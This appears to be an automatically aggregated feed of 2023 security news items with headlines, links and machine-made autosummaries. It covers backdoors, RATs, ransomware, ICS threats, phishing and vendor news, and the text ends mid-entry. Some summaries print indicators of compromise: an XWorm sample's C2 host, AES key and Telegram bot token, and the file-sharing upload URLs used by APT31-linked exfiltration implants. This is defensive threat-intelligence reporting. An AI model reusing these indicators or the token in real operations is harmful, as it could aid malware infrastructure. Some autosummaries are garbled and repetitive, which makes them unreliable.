    Autosummary: The company has more than 10,000 employees, it also provides its components to other automakers, including Suzuki, Toyota, Subaru, Ford, Volkswagen, Proton, and Peugeot. "

    ---

    Deadglyph: New Advanced Backdoor with Distinctive Malware Tactics

    exploits industry
    2023-09-23 https://thehackernews.com/2023/09/deadglyph-new-advanced-backdoor-with.html
    Cybersecurity researchers have discovered a previously undocumented advanced backdoor dubbed Deadglyph employed by a threat actor known as Stealth Falcon as part of a cyber espionage campaign. "Deadglyph"s architecture is unusual as it consists of cooperating components – one a native x64 binary, the other a .NET assembly," ESET said in a new report shared with The Hacker News. "This combination "

    Autosummary: Stealth Falcon (aka FruityArmor) was first exposed by the Citizen Lab in 2016, linking it to a set of targeted spyware attacks in the Middle East aimed at journalists, activists, and dissidents in the U.A.E. using spear-phishing lures embedding booby-trapped links pointing to macro-laced documents to deliver a custom implant capable of executing arbitrary commands. "

    ---

    Keysight collaborates with Synopsys to secure IoT devices against attacks

    industry
    2023-09-22 https://www.helpnetsecurity.com/2023/09/22/keysight-synopsys/
    

    Keysight Technologies and Synopsys are partnering to provide internet of things (IoT) device makers with a comprehensive cybersecurity assessment solution to ensure consumers are protected when devices are shipped to market. Under the arrangement, the Synopsys Defensics fuzzing tool will be embedded as an option into the Keysight IoT Security Assessment solution. The global IoT device market is experiencing notable growth due to the rise in adoption of IoT devices and is projected to reach … More →

    The post Keysight collaborates with Synopsys to secure IoT devices against attacks appeared first on Help Net Security.

    "

    Autosummary: "

    ---

    Regulatory pressure complicates cybersecurity for industrial equipment manufacturers

    industry ciber
    2023-09-21 https://www.helpnetsecurity.com/2023/09/21/industrial-equipment-manufacturers-security/
    

    50% of companies lack a dedicated security function for control systems and devices within their organizational structure, according to Cybellum. Security incidents involving industrial organizations have seen a sharp rise in recent years, with notable cases highlighting the vulnerabilities in our interconnected world. IT-OT convergence, as well as the trend towards remote maintenance, amplify potential risks even further. As industrial devices become increasingly software-driven machines reliant on an insecure software supply chain, and with regulatory … More →

    The post Regulatory pressure complicates cybersecurity for industrial equipment manufacturers appeared first on Help Net Security.

    "

    Autosummary: "

    ---

    Rising OT/ICS cybersecurity incidents reveal alarming trend

    industry ciber
    2023-09-20 https://www.helpnetsecurity.com/2023/09/20/ot-ics-cybersecurity-incidents/
    

    60% of cyberattacks against the industrial sector are led by state-affiliated actors and often unintentionally enabled by internal personnel (about 33% of the time), according to Rockwell Automation. This corroborates other industry research showing OT/ICS (Industrial Control Systems) cybersecurity incidents are increasing in volume and frequency, and are targeting critical infrastructure, such as energy producers. Insiders unintentionally aid threat actors “Energy, critical manufacturing, water treatment and nuclear facilities are among the types of critical infrastructure … More →

    The post Rising OT/ICS cybersecurity incidents reveal alarming trend appeared first on Help Net Security.

    "

    Autosummary: Insiders unintentionally aid threat actors “Energy, critical manufacturing, water treatment and nuclear facilities are among the types of critical infrastructure industries under attack in the majority of reported incidents,” said Mark Cristiano, commercial director of Global Cybersecurity Services at Rockwell Automation. "

    ---

    Red Hat and Intel deliver open source industrial automation to the manufacturing shop floor

    industry
    2023-09-20 https://www.helpnetsecurity.com/2023/09/20/red-hat-intel/
    

    Red Hat announced a new industrial edge platform, designed in collaboration with Intel, that will provide a modern approach to building and operating industrial controls. By transforming the way manufacturers operate, scale and innovate with standard IT technologies delivered to the plant floor and real-time data insights, the platform will enable industrial control system (ICS) vendors, system integrators (SIs) and manufacturers to automate previously manual industrial automation tasks including: system development, deployment and management, cybersecurity … More →

    The post Red Hat and Intel deliver open source industrial automation to the manufacturing shop floor appeared first on Help Net Security.

    "

    Autosummary: With this collaboration organizations can benefit from: Fully integrated real-time capabilities from silicon to software, to support industrial automation for predictable performance; from silicon to software, to support industrial automation for predictable performance; Advanced management and network automation for system deployment and management without heavy handed resource usage, simplifying the industrial network creation and management using open standards-based tools; for system deployment and management without heavy handed resource usage, simplifying the industrial network creation and management using open standards-based tools; Scalability and flexibility through a software-defined platform approach that facilitates more portable, scalable control and maximizes adaptability; through a software-defined platform approach that facilitates more portable, scalable control and maximizes adaptability; Uninterrupted operations supported by high-availability and redundancy attributes built-in with the platform; supported by high-availability and redundancy attributes built-in with the platform; Simplified AI workload integration with the ability to take an AI workload and run it next to a control workload, helping simplify hardware complexity, and enabling AI to more easily improve product quality, system uptime, maintenance needs and more; with the ability to take an AI workload and run it next to a control workload, helping simplify hardware complexity, and enabling AI to more easily improve product quality, system uptime, maintenance needs and more; Enhanced cybersecurity posture by removing human error elements with automated patching and updates, an immutable operating system plane and a platform built on hardened, production-tested components. "

    ---

    Inside Tiktok"s real-life frenzies - from riots to false murder accusations

    industry
    2023-09-20 https://www.bbc.co.uk/news/technology-66719572?at_medium=RSS&at_campaign=KARANGA
    Former staff and users tell the BBC the app"s algorithm has encouraged harmful real-life behaviour. "

    Autosummary: "

    ---

    Inside XWorm: Malware Analysts Decode the Stealthy Tactics of the Latest Variant

    exploits industry
    2023-09-19 https://thehackernews.com/2023/09/inside-code-of-new-xworm-variant.html
    XWorm is a relatively new representative of the remote access trojan cohort that has already earned its spot among the most persistent threats across the globe.  Since 2022, when it was first observed by researchers, it has undergone a number of major updates that have significantly enhanced its functionality and solidified its staying power.  The analyst team at ANY.RUN came across the newest "

    Autosummary: XWorm"s Tactics, Techniques, and Procedures (TTPs) The sandbox report highlighted several techniques used by the sample: Figure 3: XWorm"s activities on the infected system. Host 6[.]tcp.eu.ngrok[.]io Port 13394 AES key Slaves!-.;!2Swezy999!(xxx Splitter Xwormmm Sleep time 3 USB drop file USB.exe Mutex Lz8qftMH08V7f1rq Log file %temp%\\Log.tmp Telegram token 6674821695:AAExQsr6_hmXk6hz7CN4kMSi9cs9y86daYM Telegram chat id 5865520781 Conclusion Obtaining configurations of the latest malware is crucial but time-consuming. XWorm"s failed attempt to evade sandbox analysis Since the initial analysis report was several days old, the team decided to run the sample through the sandbox once again to check for new activities. From there, the only logical step for the team was to open the file in dnSpy, a .NET debugger, which promptly revealed that the binary was subject to heavy obfuscation. "

    ---

    Industrial cybersecurity giant Dragos rakes in new funding, sets sights on global expansion

    industry ciber
    2023-09-18 https://www.helpnetsecurity.com/2023/09/18/darren-sankbeil-dragos-ics-ot-environments-cybersecurity/
    

    Today, Dragos revealed that it has secured a $74 million Series D extension funding round, spearheaded by the strategic operating and investment firm WestCap. The funding extension comes when global governments and infrastructure providers increasingly acknowledge the critical role of industrial cybersecurity, necessitating enhanced focus on their ICS/OT settings. In an interview with Help Net Security, Darren Sankbeil, CFO of Dragos, discusses the significance of this investment for the firm amid the rising urgency to … More →

    The post Industrial cybersecurity giant Dragos rakes in new funding, sets sights on global expansion appeared first on Help Net Security.

    "

    Autosummary: In addition to our historically strong presence in the Electric, Oil & Gas, Water, and Federal Government sectors, we are seeing the Manufacturing, Food and Beverage, and Technology sectors increase in prominence as a percentage of our business. The Dragos Platform is technology built for practitioners by practitioners that arms industrial cybersecurity teams with the most up-to-date defensive tools, codified by our experts on the front lines every day hunting, combatting, and responding to advanced ICS threats.We launched the Dragos Global Partner Program this year, the only channel program to comprise OT cybersecurity technology, services, and threat intelligence as well as training. "

    ---

    Deepfake and smishing. How hackers compromised the accounts of 27 Retool customers in the crypto industry

    financial industry
    2023-09-18 https://securityaffairs.com/150981/hacking/retool-smishing-attack.html
    

    Software development company Retool was the victim of a smishing attack that resulted in the compromise of 27 accounts of its cloud customers. Software development company Retool revealed that 27 accounts of its cloud customers were compromised as a result of an SMS-based social engineering attack. The company states that one of its employees was […]

    The post Deepfake and smishing. How hackers compromised the accounts of 27 Retool customers in the crypto industry appeared first on Security Affairs.

    "

    Autosummary: But through this Google update, what was previously multi-factor-authentication had silently (to administrators) become single-factor-authentication, because control of the Okta account led to control of the Google account, which led to control of all OTPs stored in Google Authenticator.How hackers compromised the accounts of 27 Retool customers in the crypto industry Pierluigi Paganini September 18, 2023 September 18, 2023 Software development company Retool was the victim of a smishing attack that resulted in the compromise of 27 accounts of its cloud customers. "

    ---

    Europol lifts the lid on cybercrime tactics

    industry
    2023-09-15 https://www.malwarebytes.com/blog/news/2023/09/europol-publishes-report-discussing-observed-methodologies-and-threats
    

    Categories: News Categories: Ransomware Tags: Europol Tags: Phishing Tags: RDP Tags: VPN Tags: Exchange Tags: LOTL Tags: BEC Tags: ransomware Tags: IAB Tags: crypter Tags: Flubot A Europol report discusses developments in cyberattacks, new methodologies, and threats as observed by Europol’s operational analysts. (Read more...)

    The post Europol lifts the lid on cybercrime tactics appeared first on Malwarebytes Labs.

    "

    Autosummary: The most common service providers for ransomware groups include initial access brokers (IABs), crypter developers, droppers-as-a-service, money laundering, and bullet-proof hosting services.Once you"ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. These groups work closely with other malware-as-a-service groups to compromise high-revenue targets and post huge ransom demands, running into millions of Euros. "

    ---

    DDoS 2.0: IoT Sparks New DDoS Alert

    industry
    2023-09-15 https://thehackernews.com/2023/09/ddos-20-iot-sparks-new-ddos-alert.html
    The Internet of Things (IoT) is transforming efficiency in various sectors like healthcare and logistics but has also introduced new security risks, particularly IoT-driven DDoS attacks. This article explores how these attacks work, why they’re uniquely problematic, and how to mitigate them. What Is IoT? IoT (Internet of Things) refers to online, interconnected devices that collect and exchange "

    Autosummary: Process flow, demonstrating scanning, compromising, infecting and joining a new device to a botnet Advanced botnets can self-propagate, compromising more devices autonomously, bringing more and more devices into the botnet, expanding the botnet"s size and amplifying the scale of future attacks.Controlled by attackers, botnets can scale and rapidly execute various attacks, including DDoS, data theft, ad fraud, cryptocurrency mining, spam and phishing, data harvesting, and snooping—without device owners" knowledge.This broad category of devices includes sensors, cameras, network routers, and advanced machinery, and their integration into everyday life and work processes results in an ecosystem that can automate operations, improve decision-making, and enhance user experience. Incorporating IoT Devices into Botnets IoT devices that are unpatched, unattended, or misconfigured, or are already under botnet DDoS attack, are at risk of being incorporated into a botnet. Initiatives like the Cyber Threat Alliance and the Joint Cyber Defense Collaborative unite governments, tech companies, and cybersecurity firms to rapidly detect and neutralize emerging threats, strengthening collective global defenses. "

    ---

    Brazil riots: First man tried for storming government buildings gets 17 years

    latam government industry
    2023-09-14 https://www.bbc.co.uk/news/world-latin-america-66810835?at_medium=RSS&at_campaign=KARANGA
    Aecio Pereira is the first to be convicted over the storming of government buildings in January. "

    Autosummary: "

    ---

    Researchers Detail 8 Vulnerabilities in Azure HDInsight Analytics Service

    industry
    2023-09-13 https://thehackernews.com/2023/09/researchers-detail-8-vulnerabilities-in.html
    More details have emerged about a set of now-patched cross-site scripting (XSS) flaws in the Microsoft Azure HDInsight open-source analytics service that could be weaponized by a threat actor to carry out malicious activities. "The identified vulnerabilities consisted of six stored XSS and two reflected XSS vulnerabilities, each of which could be exploited to perform unauthorized actions, "

    Autosummary: "These weaknesses collectively allow an attacker to inject and execute malicious scripts when the stored data is retrieved and displayed to users," Ben Shitrit noted, urging organizations to implement adequate input validation and output encoding to "ensure that user-generated data is properly sanitized before being displayed in web pages." "

    ---

    Threat landscape for industrial automation systems. Statistics for H1 2023

    industry
    2023-09-13 https://ics-cert.kaspersky.com/publications/threat-landscape-for-industrial-automation-systems-statistics-for-h1-2023/
    The statistical data presented in the report was received from ICS computers protected by Kaspersky products that Kaspersky ICS CERT categorizes as part of the industrial infrastructure at organizations. "

    Autosummary: This group includes Windows computers that perform one or several of the following functions: Supervisory control and data acquisition (SCADA) servers Data storage servers (Historian) Data gateways (OPC) Stationary workstations of engineers and operators Mobile workstations of engineers and operators Human Machine Interface (HMI) Computers used for industrial network administration Computers used to develop software for industrial automation systems For the purposes of this report, “attacked computers” are those on which Kaspersky security solutions blocked one or more threats during the period in review (in the diagrams above, this can be a month, half-year or year, depending on the context). Categories of malicious objects Malicious scripts and phishing pages were blocked on 12.7% of ICS computers Denylisted internet resources, on 11.3% Spyware, on 6% Malicious documents, on 4% Ransomware, on 0.32%. Ten countries and territories with the lowest percentage of ICS computers on which malicious objects were blocked, H1 2023 Individual industries In H1 2023, the percentage of ICS computers on which malicious objects were blocked increased in engineering and ICS integration (by 2 pp), manufacture (by 1.9 pp) and energy (by 1.5 pp). Email clients – 6% Removable devices – 3.4% Good news H1 2022 saw a noticeable increase in the percentage of ICS computers on which the following threats were blocked: Spyware Malicious documents Malicious miners in the form of Windows executables Ransomware That was the bad news. Regions ranked by percentage of ICS computers on which threats from the internet were blocked, H1 2023 The largest increase in the percentage of ICS computers on which internet threats were blocked in the first half of 2023 was recorded in the regions that were historically the safest: Western Europe (by 2.6 pp), the United States and Canada (by 2 pp), and Australia and New Zealand (by 1.4 pp). H1 2023 changes in the percentages of ICS computers on which denylisted internet resources were blocked, by region H1 2023 changes in the percentages of ICS computers on which malicious scripts and phishing pages were blocked, by region Both threat types spread via the internet, while malicious scripts and phishing pages also spread via email. Percentage of ICS computers on which malicious objects were blocked, by regions You may remember that in the previous half-year, the percentage of ICS computers in Russia and Central Asia on which malicious objects were blocked increased noticeably due to mass infection of websites, including those run by industrial companies, that used an outdated version of a popular Russian CMS. Percentage of ICS computers on which malicious objects from various sources were blocked The percentage of ICS computers on which network folder threats were blocked As is the case with the overall threat statistics, the percentage of ICS computers on which malicious objects from various sources were blocked varies by region and country. Fifteen countries and territories with the highest percentage of ICS computers on which internet threats were blocked, H1 2023 Email clients Since the first half of 2022, Southern Europe has remained the region with the highest percentage of ICS computers on which malicious email attachments and phishing links were blocked. Percentage of ICS computers on which malicious objects were blocked, by half year That said, the percentage of attacked ICS computers dropped in Q1 2023, but then rose again in Q2 2023, reaching highest quarterly figure since 2022. "

    ---

    Guyana scrambles to make the most of oil wealth

    industry
    2023-09-10 https://www.bbc.co.uk/news/world-latin-america-66715777?at_medium=RSS&at_campaign=KARANGA
    Guyana"s president says the country has to hurry if it wants to maximise its recent discoveries. "

    Autosummary: "

    ---

    Ukraine"s CERT Thwarts APT28"s Cyberattack on Critical Energy Infrastructure

    industry ciber
    2023-09-06 https://thehackernews.com/2023/09/ukraines-cert-thwarts-apt28s.html
    The Computer Emergency Response Team of Ukraine (CERT-UA) on Tuesday said it thwarted a cyber attack against an unnamed critical energy infrastructure facility in the country. The intrusion, per the agency, started with a phishing email containing a link to a malicious ZIP archive that activates the infection chain. “Visiting the link will download a ZIP archive containing three JPG images ( "

    Autosummary: "Visiting the link will download a ZIP archive containing three JPG images (decoys) and a BAT file "weblinks.cmd" to the victim"s computer," CERT-UA said, attributing it to the Russian threat actor known as APT28 (aka BlueDelta, Fancy Bear, Forest Blizzard, or FROZENLAKE). "

    ---

    LockBit leaks sensitive data from maximum security fence manufacturer

    ransomware industry
    2023-09-05 https://www.helpnetsecurity.com/2023/09/05/zaun-breach/
    

    The LockBit ransomware group has breached Zaun, a UK-based manufacturer of fencing systems for military sites and critical utilities, by compromising a legacy computer running Windows 7 and using it as an initial point of access to the wider company network. The Zaun breach The company said that the “sophisticated” cyberattack occurred on the 5th – 6th August. “In an otherwise up-to-date network, the breach occurred through a rogue Windows 7 PC that was running … More →

    The post LockBit leaks sensitive data from maximum security fence manufacturer appeared first on Help Net Security.

    "

    Autosummary: Some of the stolen data was later leaked by LockBit on the dark web and, according to the Daily Mirror, among it were “thousands of pages of data which could help criminals get into the HMNB Clyde nuclear submarine base, the Porton Down chemical weapon lab and a GCHQ listening post.” "

    ---

    New Python Variant of Chaes Malware Targets Banking and Logistics Industries

    financial exploits industry
    2023-09-05 https://thehackernews.com/2023/09/new-python-variant-of-chaes-malware.html
    Banking and logistics industries are under the onslaught of a reworked variant of a malware called Chaes. "It has undergone major overhauls: from being rewritten entirely in Python, which resulted in lower detection rates by traditional defense systems, to a comprehensive redesign and an enhanced communication protocol," Morphisec said in a new detailed technical write-up shared with The Hacker "

    Autosummary: Chrautos , an updated version of Chronod and Appita that focuses on gathering data from Mercado Libre, Mercado Pago, and WhatsApp , an updated version of Chronod and Appita that focuses on gathering data from Mercado Libre, Mercado Pago, and WhatsApp Stealer , an improved variant of Chrolog which plunders credit card data, cookies, autofill, and other information stored in web browsers, and , an improved variant of Chrolog which plunders credit card data, cookies, autofill, and other information stored in web browsers, and File Uploader, which uploads data related to MetaMask"s Chrome extension Persistence on the host is accomplished by means of a scheduled task, while C2 communications entail the use of WebSockets, with the implant running in an infinite loop to await further instructions from the remote server. "

    ---

    The power of passive OS fingerprinting for accurate IoT device identification

    industry
    2023-08-31 https://www.helpnetsecurity.com/2023/08/31/passive-os-fingerprinting/
    

    The number of IoT devices in enterprise networks and across the internet is projected to reach 29 billion by the year 2030. This exponential growth has inadvertently increased the attack surface. Each interconnected device can potentially create new avenues for cyberattacks and security breaches. The Mirai botnet demonstrated just that, by using thousands of vulnerable IoT devices to launch massive DDoS attacks on critical internet infrastructure and popular websites. To effectively safeguard against the risks … More →

    The post The power of passive OS fingerprinting for accurate IoT device identification appeared first on Help Net Security.

    "

    Autosummary: Converging networking and security functions can allow automated collection and correlation of networking and security data from multiple sources, such as intrusion detection systems, firewall logs, and endpoint security solutions, to provide an overview of network activity and its relation to operating systems and IoT devices.Different operating systems implement TCP/IP attributes differently and may have unique values for TCP/IP fields, such as the initial time to live (TTL), Windows Size, TCP Flags, and more.Different operating systems implement TCP/IP attributes differently and may have unique values for TCP/IP fields, such as the initial time to live (TTL), Windows Size, TCP Flags, and more. "

    ---

    PagerDuty strengthens analytics capabilities and expands generative AI offerings

    industry
    2023-08-31 https://www.helpnetsecurity.com/2023/08/31/pagerduty-runbook-automation/
    

    PagerDuty introduced AI-generated runbooks in early access, as well as new analytics capabilities for the PagerDuty Operations Cloud. Using PagerDuty Runbook Automation from the Operations Cloud, customers replace manual procedures with automated self-service workflows, potentially saving hundreds of working days per year. With PagerDuty’s new generative AI capabilities, customers could realize hundreds of thousands of dollars in annual operational cost savings by using natural-language prompts paired with prompt-engineering automation–high quality prompts iteratively guiding users–to initiate … More →

    The post PagerDuty strengthens analytics capabilities and expands generative AI offerings appeared first on Help Net Security.

    "

    Autosummary: This new feature in PagerDuty Runbook Automation is the latest in a series of PagerDuty’s GenAI capabilities, which will be available across the PagerDuty Operations Cloud to help organizations automate time-critical, high-impact work, improve productivity and meaningfully reduce operating costs in uncertain economic times. "

    ---

    Velociraptor: Open-source digital forensics and incident response

    industry
    2023-08-30 https://www.helpnetsecurity.com/2023/08/30/velociraptor-open-source-digital-forensics-incident-response/
    

    Velociraptor is a sophisticated digital forensics and incident response tool designed to improve your insight into endpoint activities. Velociraptor enables you to conduct precise and rapid collection of digital forensic data across multiple endpoints simultaneously. Persistently gather events from endpoints, including event logs, file changes, and process activities. Store these events centrally for an unlimited period, allowing for historical examination and analysis. Be proactive rather than reactive. You can use a collection of forensic artifacts … More →

    The post Velociraptor: Open-source digital forensics and incident response appeared first on Help Net Security.

    "

    Autosummary: "

    ---

    What true diversity in the cybersecurity industry looks like

    industry ciber
    2023-08-28 https://www.helpnetsecurity.com/2023/08/28/diversity-cybersecurity-industry-video/
    

    In this Help Net Security video, Larry Whiteside, Jr., CISO at RegScale and President of Cyversity, discusses how, now more than ever, the cybersecurity industry needs the diversity of thought to address the increasingly complex and technology-driven challenges organizations face.

    The post What true diversity in the cybersecurity industry looks like appeared first on Help Net Security.

    "

    Autosummary: "

    ---

    KmsdBot Malware Gets an Upgrade: Now Targets IoT Devices with Enhanced Capabilities

    exploits industry
    2023-08-28 https://thehackernews.com/2023/08/kmsdbot-malware-gets-upgrade-now.html
    An updated version of a botnet malware called KmsdBot is now targeting Internet of Things (IoT) devices, simultaneously branching out its capabilities and the attack surface. "The binary now includes support for Telnet scanning and support for more CPU architectures," Akamai security researcher Larry W. Cashdollar said in an analysis published this month. The latest iteration, "

    Autosummary: "The ongoing activities of the KmsdBot malware campaign indicate that IoT devices remain prevalent and vulnerable on the internet, making them attractive targets for building a network of infected systems," Cashdollar said. "

    ---

    Talon unveils digital experience capabilities, equipping IT teams with advanced metrics

    industry
    2023-08-24 https://www.helpnetsecurity.com/2023/08/24/talon-digital-experience-capabilities/
    

    Talon Cyber Security has released new digital experience capabilities available in the Talon Enterprise Browser. The capabilities arm IT teams with advanced metrics on device, application, and network performance to ensure that issues can be proactively resolved, and employees have consistent user experiences that power productivity. “In today’s work-from-anywhere world, it is mission critical that security tools do not negatively impact the user experiences that workforces expect,” said Ohad Bobrov, CTO, Talon Cyber Security. “By … More →

    The post Talon unveils digital experience capabilities, equipping IT teams with advanced metrics appeared first on Help Net Security.

    "

    Autosummary: "

    ---

    Anticipating the next wave of IoT cybersecurity challenges

    industry ciber
    2023-08-23 https://www.helpnetsecurity.com/2023/08/23/roland-atoui-red-alert-labs-interconnected-iot-environment/
    

    In this Help Net Security interview, Roland Atoui, Managing Director at Red Alert Labs, discusses the intricacies of transitioning from isolated IoT setups to interconnected environments, examining the broadening attack surface and the nuanced complexities this evolution imposes. Atoui also delves into the urgency for standardization, the threat of cascade failures, and the blurred lines of accountability among stakeholders. Given the transition from siloed IoT devices to interconnected IoT environments, what are the main challenges … More →

    The post Anticipating the next wave of IoT cybersecurity challenges appeared first on Help Net Security.

    "

    Autosummary: This layered scrutiny reinforces the collective resilience of the entire IoT environement, addressing the multifaceted challenges of interoperability, security, and installation, and ultimately setting a benchmark in cybersecurity excellence.In this Help Net Security interview, Roland Atoui, Managing Director at Red Alert Labs, discusses the intricacies of transitioning from isolated IoT setups to interconnected environments, examining the broadening attack surface and the nuanced complexities this evolution imposes. A comprehensive understanding of the interaction between hardware, software, and human actors helps in creating a coherent, unified security strategy. "

    ---

    Ecuador election: Narco politics rule ahead of polls

    industry
    2023-08-18 https://www.bbc.co.uk/news/world-latin-america-66540765?at_medium=RSS&at_campaign=KARANGA
    A rise in drug crime in the once-peaceful country has dominated the build-up to Sunday"s election. "

    Autosummary: "

    ---

    A closer look at the new TSA oil and gas pipeline regulations

    industry
    2023-08-18 https://www.helpnetsecurity.com/2023/08/18/tsa-oil-and-gas-pipeline-regulations-video/
    

    The TSA has announced updates to its Security Directive (SD) to strengthen the operational resilience of oil and natural gas pipeline owners and operators against cyber-attacks. In this Help Net Security video, Chris Warner, OT Senior Security Consultant at GuidePoint Security, discusses how these newly introduced provisions mandate pipeline owners and operators to proactively enhance their systems’ security and protect against potential cybersecurity threats in the oil and natural gas sector. Despite the resource challenges, … More →

    The post A closer look at the new TSA oil and gas pipeline regulations appeared first on Help Net Security.

    "

    Autosummary: "

    ---

    Cleaning Products manufacturer Clorox Company took some systems offline after a cyberattack

    industry ciber
    2023-08-17 https://securityaffairs.com/149585/cyber-crime/clorox-company-cyber-attack.html
    

    Cleaning products manufacturer Clorox Company announced that it has taken some systems offline in response to a cyberattack. The Clorox Company is a multinational consumer goods company that specializes in the production and marketing of various household and professional cleaning, health, and personal care products. The cleaning product giant announced it was the victim of […]

    The post Cleaning Products manufacturer Clorox Company took some systems offline after a cyberattack appeared first on Security Affairs.

    "

    Autosummary: "

    ---

    Major U.S. energy org targeted in QR code phishing attack

    financial industry
    2023-08-16 https://www.bleepingcomputer.com/news/security/major-us-energy-org-targeted-in-qr-code-phishing-attack/
    A phishing campaign was observed predominantly targeting a notable energy company in the US, employing QR codes to slip malicious emails into inboxes and bypass security. [...] "

    Autosummary: Roughly one-third (29%) of the 1,000 emails attributed to this campaign targeted a large US energy company, while the remaining attempts were made against firms in manufacturing (15%), insurance (9%), technology (7%), and financial services (6%). "

    ---

    A massive phishing campaign using QR codes targets the energy sector

    financial industry
    2023-08-16 https://securityaffairs.com/149567/hacking/phishing-campaign-qr-codes.html
    

    A phishing campaign employing QR codes targeted a leading energy company in the US, cybersecurity firm Cofense reported. Starting from May 2023, researchers from Cofense discovered a large-scale phishing campaign using QR codes in attacks aimed at stealing the Microsoft credentials of users from multiple industries One of the organizations targeted by hackers is a […]

    The post A massive phishing campaign using QR codes targets the energy sector appeared first on Security Affairs.

    "

    Autosummary: Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, QR codes) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share OnOther top 4 targeted industries include Manufacturing, Insurance, Technology, and Financial Services seeing 15%, 9%, 7%, and 6% of the campaign traffic respectively.” "

    ---

    Monti Ransomware Returns with New Linux Variant and Enhanced Evasion Tactics

    exploits ransomware industry
    2023-08-15 https://thehackernews.com/2023/08/monti-ransomware-returns-with-new-linux.html
    The threat actors behind the Monti ransomware have resurfaced after a two-month break with a new Linux version of the encryptor in its attacks targeting government and legal sectors. Monti emerged in June 2022, weeks after the Conti ransomware group shut down its operations, deliberately imitating the tactics and tools associated with the latter, including its leaked source code. Not anymore. "

    Autosummary: "

    ---

    How manufacturers can navigate cybersecurity regulations amid NIST 2.0

    industry ciber
    2023-08-14 https://www.helpnetsecurity.com/2023/08/14/cybersecurity-regulations-nist-2-0-video/
    

    The National Institute of Standards and Technology (NIST) released a discussion draft for possible Cybersecurity Framework (CSF) changes earlier this year. The proposed changes aim to help increase the CSF’s clarity and bring the updated version closer to national and international cybersecurity standards and practices. In this Help Net Security video, Ahmik Hindman, Sr. Network & Security Solution Consultant at Rockwell Automation, discusses the evolving cybersecurity landscape and what the new cybersecurity framework could mean … More →

    The post How manufacturers can navigate cybersecurity regulations amid NIST 2.0 appeared first on Help Net Security.

    "

    Autosummary: "

    ---

    Researchers Shed Light on APT31"s Advanced Backdoors and Data Exfiltration Tactics

    industry
    2023-08-11 https://thehackernews.com/2023/08/researchers-shed-light-on-apt31s.html
    The Chinese threat actor known as APT31 (aka Bronze Vinewood, Judgement Panda, or Violet Typhoon) has been linked to a set of advanced backdoors that are capable of exfiltrating harvested sensitive information to Dropbox. The malware is part of a broader collection of more than 15 implants that have been put to use by the adversary in attacks targeting industrial organizations in Eastern Europe "

    Autosummary: "

    ---

    Industrial PLCs worldwide impacted by CODESYS V3 RCE flaws

    industry
    2023-08-11 https://www.bleepingcomputer.com/news/security/industrial-plcs-worldwide-impacted-by-codesys-v3-rce-flaws/
    Millions of PLC (programmable logic controllers) used in industrial environments worldwide are at risk to 15 vulnerabilities in the CODESYS V3 software development kit, allowing remote code execution (RCE) and denial of service (DoS) attacks. [...] "

    Autosummary: "

    ---

    Common TTPs of attacks against industrial organizations. Implants for uploading data

    industry
    2023-08-10 https://ics-cert.kaspersky.com/publications/common-ttps-of-attacks-against-industrial-organizations-implants-for-uploading-data/
    In this part we present information on the four types of implants and two tools used during the last (third) stage of the attacks discovered. "

    Autosummary: (cl.exe) F8553382DE7E1E349D8E91EDB7C57953 (cu.exe) 5137C61734E2096018CEE99149DAC009 (conhost.exe) 5660CB556D856D081A3DCD497549F47A (Rar2.exe) 976B59F170136B9C3C88BD9A8FC4CE4E (Rar3.exe) D6CC6A4AF4720DAF8EEE0835D6E5D374 (Rar4.exe) Tool used to upload files to Yandex Disk MD5 5C3A88073824A1BCE4359A7B69ED0A8D (AuditSvc.exe) Tool used to upload files to temporary file sharing services MD5 8BA9EE9FD6BD4B9304F7FB868CE975D8 (transfer.exe) IP/URL img[.]onl/api/upload.php litterbox.catbox[.]moe/resources/internals/api.php imgbb[.]com transfer[.]sh share.schollz[.]com 0x0[.]st/ Service URL address imgonl(onl) https://img[.]onl/api/upload.php litterbox(lit) https://litterbox.catbox[.]moe/resources/internals/api.php imgbb(ibb) https://imgbb[.]com/ transfer(trs) https://transfer[.]sh schollz https://share.schollz[.]com null(0x0) https://0x0[.]st/ tinyimg(tin) https://tinyimg[.]io/upload gifyu(gif) https://gifyu[.]com/ imgshare(ims) https://imgshare[.]io/ imgpile(imp) https://imgpile[.]com/ zippyimage(zip) https://zippyimage[.]com/ extraimage(ext) https://extraimage[.]info/ picpaster(pic) https://upload.picpaste[.]me/ imaurupload(imu) https://imgurupload[.]org sm.ms(sms) https://sm[.]ms/api/v2/upload easycaptures(esy) https://easycaptures[.]com/upload_file_new.php Along with various parameters designed for flexibility and optimization, the tool can generate and use a client-side RSA key. Third-step implant variant sending “.rar” files to some local C2 Later, the threat actor deployed a new variant of the second-step implant, whose capabilities included looking up file names in the Outlook folder (i.e., email account names), executing remote commands and uploading local or remote “.rar” files to Dropbox by calling the third-step implant. The entire stack of implants used in attacks can be divided into three categories based on their roles: First-stage implants for persistent remote access and initial data gathering Second-stage implants for gathering data and files, including from air-gapped systems Third-stage implants and tools used to upload data to C2 In this part we present information on the four types of implants and two tools used during the last (third) stage of the attacks discovered. Second-step implant starts a third-step implant (named “cl.exe”) to upload “.rar” files to Dropbox It should be noted that before calling the third-step implant to upload files, the second-step implant prepends a custom header to each “.rar” file. JSON log produced by the tool The threat actor most probably used the tool manually or semi-manually to upload logs and other files to file sharing services, while the resulting JSON containing URLs could be uploaded by any of the first-stage implants described in the first part of the article or by the implant designed to send a single file, “111.log”, as an email attachment via the Yandex email service (that implant is described below). Using some unknown tool to check privileges to access a remote host To upload local files, the second-step implant calls a third-step implant, which is supposed to be already deployed on the machine either at the statically defined path “c:/users/public/” or at the same path as the second-step implant. "

    ---

    Recent ransomware attacks share curiously similar tactics

    exploits ransomware industry
    2023-08-09 https://www.helpnetsecurity.com/2023/08/09/ransomware-attacks-similarities/
    

    A series of ransomware attacks made by different groups share curiously similar characteristics, according to Sophos. Sophos released new findings into the connections between the most prominent ransomware groups this past year, including Royal, in its Clustering Attacker Behavior Reveals Hidden Patterns report. Distinct similarities found in recent ransomware attacks Over the course of three months beginning in January 2023, Sophos X-Ops investigated four different ransomware attacks, one involving Hive, two by Royal, and one … More →

    The post Recent ransomware attacks share curiously similar tactics appeared first on Help Net Security.

    "

    Autosummary: Distinct similarities found in recent ransomware attacks Over the course of three months beginning in January 2023, Sophos X-Ops investigated four different ransomware attacks, one involving Hive, two by Royal, and one by Black Basta, and noticed distinct similarities between the attacks. "

    ---

    Preventative medicine for securing IoT tech in healthcare organizations

    industry
